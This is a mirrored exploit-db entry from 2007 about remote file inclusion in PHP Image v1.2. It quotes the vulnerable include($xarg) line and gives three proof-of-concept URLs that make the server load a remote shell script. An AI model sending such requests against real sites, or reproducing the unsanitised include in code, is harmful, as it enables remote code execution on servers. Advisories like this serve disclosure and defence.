bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4565.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

22 lines
No EOL
550 B
Text
Raw Blame History

PHP Image v1.2 Multiple Remote File Inclusion
Download: http://www.phpimage.co.uk/phpimage_v_1_2.zip
Bug found by Civi
Vuln code in xarg_corner.php, xarg_corner_bottom.php, xarg_corner_top.php:
<td style="background-image: url(images/cor_top_fill.jpg);"><?php include($xarg); ?></td>
POC:
http://site/xarg_corner.php?xarg=http://shell.php?
http://site/xarg_corner_bottom.php?xarg=http://shell.php ?
http://site/xarg_corner_top.php?xarg=http://shell.php?
[Original Post: forum.darkc0de.com]
Tnx to: d3hydr8, str0ke
# milw0rm.com [2007-10-23]
Reference in a new issue View git blame Copy permalink